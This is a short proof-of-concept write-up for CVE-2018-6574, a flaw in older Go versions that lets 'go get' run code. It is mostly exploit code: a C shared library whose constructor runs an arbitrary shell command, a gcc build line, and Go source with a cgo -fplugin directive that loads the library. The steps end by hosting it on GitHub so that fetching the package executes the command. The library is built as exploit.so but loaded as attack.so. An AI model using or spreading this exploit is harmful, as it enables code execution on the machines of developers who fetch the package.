Exploit POC For CVE-2018-6574
- Create an exploit file with the following:
#include<stdio.h>
#include<stdlib.h>
static void malicious() __attribute__((constructor));
void malicious() {
system("COMMAND");
}
- Compile it:
gcc -shared -o exploit.so -fPIC exploit.c
- Finally, you need the go code that will tell cgo to use your plugin:
package main
// #cgo CFLAGS: -fplugin=./attack.so
// typedef int (*intFunc) ();
//
// int
// bridge_int_func(intFunc f)
// {
// return f();
// }
//
// int fortytwo()
// {
// return 42;
// }
import "C"
import "fmt"
func main() {
f := C.intFunc(C.fortytwo)
fmt.Println(int(C.bridge_int_func(f)))
// Output: 42
}
- then host in a github and run it to gain command Execution:
go get github.com/your-repo/CVE-2018-6574-POC
- before 1.8.7
- before 1.9.4
- before Go 1.10rc2